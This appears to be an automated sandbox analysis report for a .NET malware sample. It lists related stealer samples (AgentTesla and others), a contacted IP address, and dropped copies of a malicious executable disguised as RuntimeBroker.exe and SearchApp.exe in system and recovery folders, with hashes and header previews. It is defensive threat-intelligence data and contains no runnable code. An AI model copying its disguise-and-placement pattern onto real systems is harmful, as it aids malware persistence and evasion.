                  4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                  • 208.95.112.1
                  DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                  • 208.95.112.1
                  tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 208.95.112.1

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Program Files (x86)\Google\9e8d7a4ca61bd9

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (940), with no line terminators
                  Category:dropped
                  Size (bytes):940
                  Entropy (8bit):5.918359540230003
                  Encrypted:false
                  SSDEEP:24:78xcPFv+QHymjvysFMFF88j2bLewtfkinxLiNiEmvclz:78xcPFv1YsFMFafbLNZkOumElz
                  MD5:76002DA45568B62B79AC409D369E2E5D
                  SHA1:45D6322A71C642AF575C30CC73063CA5D994AEDB
                  SHA-256:030060C42C9A7B21CF386B9300431B5010E1C1C89606DC760533BB06F67E7A7D
                  SHA-512:5E77F3405936C1D35CA75DF1EDD31C307F82AA5442965A908F59EC83EA945BD189D843E3A0F79F1A01B1C45B86750506518A4F10977A28E968EA161F649B2AA4
                  Malicious:false
                  Reputation:low
                  Preview:NqVgyqSjEuyj5WcMdKq5vYj8BV8simzahGM93SuRGannhpYMK5OCXMKyGXecrjAc4XCyKdTKaYzVv6aW6whnYxDV5X2gyRkgZLsKnkBrlDm8WyDK6If4BXDHUq2xkxWIyS6kNQsWv0BUKE9HUsjpvqeBHl07rOHyrdKD2c6qaIILWt6Pqvc1NqWHy4cmavphsNmq45O1v3PmhSpYokQ5vPkBHCP7AUPpdlcIGPVvglGUbtkfOE8zetvdmlj2qR1bnkJ6zgRYPfYKIQjXctt5VZKtz9gfqcEPtoq0knprwjk8UlUWBMZ6i5FOZZG0AwswaJbejtwyEBIwzLZOoJdeDIrxjcbLhyrA1xiLK0wSZl1gwTZNA2M1TOtSbn5HRlRPTI5BnNExWLFbQKAPDNKomzrmEPtg5pAxUmNoXXkwyYeIJRCRmpEEamndbS6Yeh2rKRHo7W1pnY0NVjdwNc4Pk6Wr8tNFbLSRfx71KXTQxZaCwZI2yKKBmnGN4ZpOJwObFjrhlmmzIobLfT5ikVQQAQo2rt6usFGBL87NskQMhV38L4sleGnyf7ay4z01p1HChaAhWr09EEtpXqrwBVQlbSgNiJS2uYhqO0av4KOwQotbOvbOID0TlfkP4w9NZ7OpgCbgP620GdVxiE9wsEuqiNFsQL0HLBXSZE4LT48LK9NHKxqzwMfVNhGT7sQEFuoFGCXeKycxFifjA7hceBU9gCE17kOko3GaUHBHaMo8tsPoBhT9LykDapjD8fhjj2ILcFP25aBRWWQywazaROZ0TC9pi7J4pEY1jEM5SaDvwSqDYuRhqGSUcS2ZFkT8QHmS7ZOrO3H1LoEAW6QyqmNiwEYQLwzrGFeoqYG9fjSw9bJxO2DJTfRo3Df3A8gbDauFKaT70QSGTbjV4kCTtqXlx0um3M9hD1tiqDnyiFTDNLUc

                  C:\Program Files (x86)\Google\RuntimeBroker.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 88%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Program Files (x86)\Windows Media Player\Media Renderer\66583f2b23107c

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (525), with no line terminators
                  Category:dropped
                  Size (bytes):525
                  Entropy (8bit):5.849132361841309
                  Encrypted:false
                  SSDEEP:12:kKKopIEjRF8pXR/CX9oxP/6cxVFrA/4MFix60ZrRzYjg4WeP:l3pvSJkX9EP/6unrCox601R94WeP
                  MD5:BF88470E2EF06444809759791CE518D6
                  SHA1:298041AB8C08940B200F2326D1D1895A8E367AD4
                  SHA-256:4BFF516925F81B4248BC46B8C1D4EDCFA8E6C631446F5E13F9465D5F60835575
                  SHA-512:48C1B965C6DCBCFC8BEC9A3F9AD24C554469BB4ED88F43FE597F15DD3E92524427FDDD7514281FA305553F3C23F1B03F46214DEDC13428622ECE8252BF57BD8F
                  Malicious:false
                  Preview:UK3P2QWUi6fKyvniZtcWulkBloxZTYNxNDauiuUPjwruCBmYCuG8E6vsk2oNc7BJtr6vV39pZNw74z8jCYXiSPtQRsJqFHwmvhBUE1DJuaj1Kyxu3ELEjc0d8pdmtTjSaJMWyofKVNx2p2Gd4ZwB5sCSrhVZXaab1RaAla6OjAtVo8yGi9sTgiWsG4pQTFx4xWBYbG2edic58qnttP0XsG5S4r3qvq5dNyiS7ZocHOz8FataR6gDPZMqasdtMLsxm8sKIUvTkXQdQ7Me8dZyJ1Nxl12P65P6fCVHsiR7KMd1Jsacf9vtv4nuv5jRbgXpIU8OlFwZLco6YVo2bZt7JfKlZlWx9AfnzytzuL0ZNViTPrVZQr0BwafmJXzAt8aL7AHkmzHPiUty70VrP6gRKd1ZSHpWWzpO5WWPkvxbjkccqqoSCHvwcIBdIrReKv2tpf2leFHeJFsjAZslcWUPE2vwV2G2dSQystwKxDy69RnXacdt8pCyamowtGQm8PA1y30QmhxZiXPxP

                  C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Program Files\7-Zip\38384e6a620884

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (439), with no line terminators
                  Category:dropped
                  Size (bytes):439
                  Entropy (8bit):5.840957454971274
                  Encrypted:false
                  SSDEEP:12:6XjucCVbFKkRzQvMKN1CHGq3daOUbXaoJf:iabVYkNoNi3dgbX5F
                  MD5:604C3B695B8FA6A2765C5C3B77D0944B
                  SHA1:532E6604798FED29936A5317E8B897F1051ECBF5
                  SHA-256:21D42D8E5D7B585F56006A78BB2296B437B569BC3A118D9B4DA510B5A8916C04
                  SHA-512:D58493A1441663A7B7EB6EF63A71AC9FDA04CF297C957612D30543F0CF902F6CF7301D7253231FC63E5C94D3E14F48D629F6E576A70D68FE3A7FC9321ABEA090
                  Malicious:false
                  Preview:rxL8uQviglNHb1mQCW1hVtXOlWNlVgvKlHGmWZfgdzzRLPc5nMUsOdF7Z7WYCKNA0CfTvA3n1UDf4GCW3R7ILC6IBIMZCHeSmzaJtIJnTr14ZjDT4AevNEzxFWSnxelt0u3Fp3mvHUzeLCtbE3eBnsFh9nDXzgzzFIEoq8nBYsn2PVlDm0i49kFHoVFCzO5le9YD8FvGQdm4FNSoBAu9850fC69V3kLJxCXP6iEhFbof7LCbDaBze6mjJ3BBFZNpRdGCzCsc5M3gQUi04hRdjWo1ZxFDhDcpO8OdE9mAri3SCFSzUKGhHtF4yPnB6p52uNRSFEw55RvBdWyTfQsW64he3TpzWkDCmBhyxAtPYLm08DbbaTgq6j50pxZwZ7jUNsZcyAgegc8vSrfz1NYCEXGCFrIAl70alRnQo9naxBKekKh8Rj4MigQ

                  C:\Program Files\7-Zip\SearchApp.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Program Files\Windows Defender\Platform\9e8d7a4ca61bd9

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (621), with no line terminators
                  Category:dropped
                  Size (bytes):621
                  Entropy (8bit):5.87601618717999
                  Encrypted:false
                  SSDEEP:12:6850Re2o7zv7hZMN6vUBXamcdATuxFMuiQRX4HRx:b84hmQBx3Z+L
                  MD5:A275BF3BB64F378B2EAED54B68B74921
                  SHA1:AC6CE3FD1E51D1EF50D23B90DE26C670B501053A
                  SHA-256:35A0F173034B5C57ED3DC29F33C54319778979C62B92AACB638E2D895A741EF5
                  SHA-512:91CF3BD37D7AB69B3D2EF0E63BEAEFF1ECE0B11F13E9647E7895E873F70615437BADB8CF9BCDBAA0590031387B6B6505A13AFDCBE8585188B93042F09B2DAB3E
                  Malicious:false
                  Preview:hJADPK2k8PCNmc5JJtBCn1EBxoRmfiRJk1DAh4CZCmkQNm94b7rv1h8pE9Qk2PEZ83muY4mOrm9BRyxLpXKi0fSD3X5iobgwiKSU9PfgVcEOh7YQLF5fFficli1B9DkPGNcGfdLa1nNYaDg58oXjgArCl0sbXdhR2zHUeRvr4enbSKBhC5CUqAsFfafpuuCYG5fl6Mar3ppBXPuazLYcbMk1GByEwF6KcPUWpZl0eVaAVqsPpE0jVk64Uoe4XW4xsfjI5XvZki7FvkfaTiYsPXy2SaBB5qcIanS0HkUSSb9wm1IuIEky7MiVqqzeVud3FzoISpStOGZyYCPbRQ21GoKOF6Kbuz6i7FrxMAcdv1j1wt7oaYNE1mxaoZDVe19ZJ11SVcORyZFOEScV9gAVm1qVSQIw7H842Kr52oT8J5QcgiWV7rW80nxSKfAETcUraKW4lgdUNBMqkNyt3xyPu9EPXYuWoOprljCVMbuaNBvyaGr6rQKfnE6aGHgMwHp8WeEBLchcCYBtOPyQrxoYDJEgnlPE4hoGWwc6BqvOsscPCNM1SQf8cR5MZiYjNdhft5Xbw1OACaqUqzdZZXvoCqnF1PgdSLBPL7fG0uEbBe5Ck

                  C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Recovery\66583f2b23107c

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (607), with no line terminators
                  Category:dropped
                  Size (bytes):607
                  Entropy (8bit):5.899692363482537
                  Encrypted:false
                  SSDEEP:12:rfB4tl3IDgfQtKYcA7R+VDFRseWhhoivB20DNrJRcl8KAr4Xx/wcZYX+a:rfB3mKKxSR+VDFMh1FDtJRcuRw91a
                  MD5:6351CB25349699F78BCDADC5408A4410
                  SHA1:FC541797E8E09A24DB905839EB108582BA98FB97
                  SHA-256:82007D876AEE2D660F4867C1BEE992D634A87910333594F960D8AABE21BAFE44
                  SHA-512:07185B714DE6DCD0B464F5B47872E3802DC345BEAAEA9AFCD840CD66D260C2FEA3615667BF5E6505F3A4F83FC53227A89AAB1ED1F0C5B0ABB44A87EE73A184C4
                  Malicious:false
                  Preview:aEFmnKfJgZfXEbFbJrCoPnY37HY03uc5iqsHxTvnjUEPGokCt5ipAlVwpMofvpPw6kzXs8oz6YE5iJxTgVG8Mw47U6bloP14ESSfzNTvRstlhaNgYV9ajRkJq1CwgCLqhK0Q0ReTBUqeCSZ4s5MTQbVwsJz7KhOOgDEXj6qG0pYOlFHYbIDlz1ZGyEirchJeFb79NCUvOGclCGLmCbfBdnYpn8ifY8oTg4IJIHKZxRWtYyDs35pACHBcCRVOezXQbJEH8Bd4QGOLQpQy4zldTnRY3pH0v6474GRPt6t1buu52zLXBgToN36y2qOS4mIULRRKXBF8GuBi2VgEdtzOmPtAKdWDra7zmatliBA9bUid2X5hKKyKx3r6hQ93oBRpwL6cl4fbt0wRqPHwiz3hlxCssxERCGUaD3rqac5PoXb7GZPRIMVzHuD9JOtyzOZmfWOxiaWF3n2OVFlShxIzufTTzshMtHaa7ybuLbsr0Q5d1ynEmbQCFk19D5703KWwNcRhn0HFEb9ejzbBEcjS1XUX6brQd2xq4IPZgFbvTK8olXZNd6vblD50H4kLJ0mLnTkbjBe8Bx8qYqwjBewhGWF0NZSmePm

                  C:\Recovery\9e8d7a4ca61bd9

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):300
                  Entropy (8bit):5.802984193378431
                  Encrypted:false
                  SSDEEP:6:KAGCx2JRx8A7SidNKnfwsCpp5Ec46O4f33Me0QdClWu2V0LO9PycwLgfyS:9xx2JDNSiP8fwRSc3VPpxtAzuyS
                  MD5:8073DEA439E042A71C1E2DC16F1DCC90
                  SHA1:A5994951DF2D64D0517B6DCB09601EE76A8F6C23
                  SHA-256:7E7E2E2D359673D405719D2D9F24E08ABEA2BF2021D7D6564100691EA2F97058
                  SHA-512:C9B377ED47D1F6601AC91C3F0FC5CFCF6CCE6C709071578F2CA5B41E91B102C10BD6C6824BBF90CEBDE2779532D404DEEDB54A26BC13E0FA5CF533C558126724
                  Malicious:false
                  Preview:TpqDnRuCcsAo17OvnWUXmfRItOjm1JVgivTI1CqwcI2udeHcqaEArvqyYhTYrILSWdGFnG3lqi4dmgpOHH6aFVzxFfuUsREU7jYAYBzjhcTI0ML12FRkMuNBoTAIWj3ZekgCIo0FSW3mBq72T3bn9dIMWXVEBqN8j4oQqJsNOMSz1l97WHydHPZAbTqvSvElI4CGBrMKKNYxLTVuXYs32u0UfoyWc64cHqr6j35p5oS40myI86Y4DKtYEslX2zrNS5pelYLdcD8Nb6d3zqYgiAZ67S20SixF7El56Ugju5cA

                  C:\Recovery\RuntimeBroker.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Recovery\WGNWJePMcpkvwPkbkGq.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\66583f2b23107c

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (540), with no line terminators
                  Category:dropped
                  Size (bytes):540
                  Entropy (8bit):5.870842682022011
                  Encrypted:false
                  SSDEEP:12:89kc7CA+LWhPi0JuyI9B5yAuamWTgmry3DUzC7/D2BGVewVP:bc7CnWe57Q2bTdyTZf5VewVP
                  MD5:C8D12594E4A5681CF96633E5C163A1A0
                  SHA1:B0502B94C7B05C498518191693C2F9401B587F06
                  SHA-256:9FB6C68E993783A8E79E668D2B9E91C3612D3BCAAAA7D315B8E86FA812EB53FD
                  SHA-512:553E3FB9338DFE13056A3B9AE9257D1ED2A5D1B2247A0F838E22398B9CDEF97E7A919B1234A160ED8B286DD853E93242ED21767940D45037635DD9F4437E6610
                  Malicious:false
                  Preview:Vvs1YbJtTXjoTUmhukeQt6ZUBLhSfcxiKhGQwEnJbwQrYffWP5SsxTxYWYzN30O1jBdwOWvq6Uz7qr5fqLCjKFu1tr3YOaQkiZIWBtI3Jmvce0socUgsyoqdRmCgcWbfEOYQjjd6CJaiTRX39P643hw4soFZqlaxKQYQbbE20kpoOIK9OJhNahlgbdi5eDQbtmXD3HbhLDDT2IqjeFKhDNXno1y72JYwTO5lvGGHrACWdRoTx9aY2sXfPtYBSeoBpQ9nMFxX9D0DKAKWNfK3s93l1ZWBsEzMVArMSAGsLDZz2TUOjBywTuTpWYwwtwo4NnrKT7EMZbsojEshEHcrPD3lqBz3NT9ZYfmPmK5l6mW1CoGSqPrlT7pKuGdRIL8FcTQEcc54L0unqBiC5hN8lXFa0bffqodvnRZtYC0NUxadNBeshbWk8AdFNzOA7ZNhX99Ylzo3q9oy6mNy7w8PS2xnxUfix0Q4j3GNBFHrxc48VoIlmZCKa8OeMWkRUFF0ttODf9w2pQbz8ySIM36YxFelolBp

                  C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\Public\Pictures\66583f2b23107c

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (453), with no line terminators
                  Category:dropped
                  Size (bytes):453
                  Entropy (8bit):5.866910013793881
                  Encrypted:false
                  SSDEEP:12:oLSJ9LqqrN5AMBg7lvPAlURA2un0aSAMk9:oLWmqrN5dg7lPlGOAx9
                  MD5:F5B362ACA59E760E381C1CB677485022
                  SHA1:E28CCBBED4F247A793C87E3794411014459C7B20
                  SHA-256:D27B5921FD199D69587B526F17ED4B4B6D7A8F6C23076FC1B2F6BFA5357D34CF
                  SHA-512:4186E018692188FA774691D9218D2B2212741377AE6B387C269361FF53956DDB23FB7F50BDD8C21F19D7A1B3097C6FF7BDE88337E71FD049DEF924A832804425
                  Malicious:false
                  Preview:VhMKAFVbHK9rmhf7GiwrH1qlIIqse2glXHAAinRSZgZEoWuxArtWDzTd0kB1Zn7PoXUeheZdQeRlcm6vY2rwIKiiygJ7la3vjKZRCQQgSPFihsBOoQcg6LGezvqBUb20lfCRMptImKd3F9AFe5TU7WzXE5cQkOL1XP7BquC8hU4vrMYzvkgZHh2OqoMQNciX9mf0B8Yu3UxnbDp1gmf9svtzWsVChvvEwgwFqiywMwgxtPwm8Vtk7ipN3qdSnWNHjt05RkK8ysx5P6FH6sDLCKHN1iLAFfIziZOAY1UXKvwOvt87kWW5SBEYlmDtYK2Tj7WzsFsEXqBQY3cHjOatINhhU0Zwyl9A2doyWJPfnSim9y9sK5KJtJKWZzf2p6QwrBY5Onua95F0p5hg0ql2azQtSSZhnXzrBw58aDehLuKxETreS8B9UXV1uom6ONwmGXy39

                  C:\Users\Public\Pictures\WGNWJePMcpkvwPkbkGq.exe

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\webnetdhcp.exe.log

                  Download File
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:CSV text
                  Category:dropped
                  Size (bytes):2144
                  Entropy (8bit):5.370181720626662
                  Encrypted:false
                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpp+vxp3/elTJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpQZp/X
                  MD5:AED51D8E24DFF6329D557599397A4AF5
                  SHA1:08FDB23410F7C47067DBEE97FB37F5A09ABCDA52
                  SHA-256:D0BF5F260E6183B5E7BE1B9012AE9AD2C6C432CE03DDC101FCD5769A06DD8160
                  SHA-512:E6AA03BC1249F1D01423907E0770562A8BC30362505E0E03545BAD115F0BAABB8D3D2E37AE7191CCF5AA9BE5480F17317BED8706D6BBFB316E82EFCC2D85C2B1
                  Malicious:false
